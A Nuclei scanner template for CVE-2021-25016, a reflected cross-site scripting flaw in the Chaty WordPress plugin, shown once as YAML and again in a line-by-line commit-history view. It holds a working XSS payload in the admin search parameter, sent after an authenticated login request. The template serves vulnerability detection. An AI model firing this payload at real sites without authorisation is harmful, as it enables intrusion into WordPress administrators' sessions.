nuclei-templates/http/cves/2021/CVE-2021-25016.yaml

id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.42975
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c8a6fbd0693c37cac527a5cb0164f0142e34268fe29c413a358ca8fbb2db6b97022100f3963f4b2e093457d02e02ce6a5d8ef5c52c74fc76932dba86db5a7d9010d868:922c64590222798bb761d5b6d8e72950
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`id: CVE-2021-25016`

			`info:`
fixed errors 2023-10-17 08:16:05 +00:00			`name: Chaty < 2.8.2 - Cross-Site Scripting`
			`author: luisfelipe146`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`severity: medium`
			`description: \|`
fixed errors 2023-10-17 08:16:05 +00:00			`The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.`
			`remediation: Fixed in 2.8.3`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0`
fixed errors 2023-10-17 08:16:05 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-25016`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016`
fixed errors 2023-10-17 08:16:05 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cve-id: CVE-2021-25016`
fixed errors 2023-10-17 08:16:05 +00:00			`cwe-id: CWE-79`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`epss-score: 0.00106`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-percentile: 0.42975`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cpe: cpe:2.3:a:premio:chaty::::::wordpress::*`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 2`
			`vendor: premio`
			`product: chaty`
			`framework: wordpress`
fixed errors 2023-10-17 08:16:05 +00:00			`publicwww-query: "/wp-content/plugins/chaty/"`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00
			`http:`
fixed errors 2023-10-17 08:16:05 +00:00			`- raw:`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
fixed errors 2023-10-17 08:16:05 +00:00			`GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`Host: {{Hostname}}`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`cookie-reuse: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00
fixed errors 2023-10-17 08:16:05 +00:00			`matchers-condition: and`
Create CVE-2021-25016.yaml 2023-10-16 18:37:06 +00:00			`matchers:`
fixed errors 2023-10-17 08:16:05 +00:00			`- type: word`
			`part: body`
			`words:`
			`- "search=</script><img src onerror=alert(document.domain)>"`
			`- "chaty_page_chaty"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`- 200`
TemplateMan Update [Thu Nov 9 10:11:53 UTC 2023] :robot: 2023-11-09 10:11:53 +00:00
			`# digest: 4b0a00483046022100c8a6fbd0693c37cac527a5cb0164f0142e34268fe29c413a358ca8fbb2db6b97022100f3963f4b2e093457d02e02ce6a5d8ef5c52c74fc76932dba86db5a7d9010d868:922c64590222798bb761d5b6d8e72950`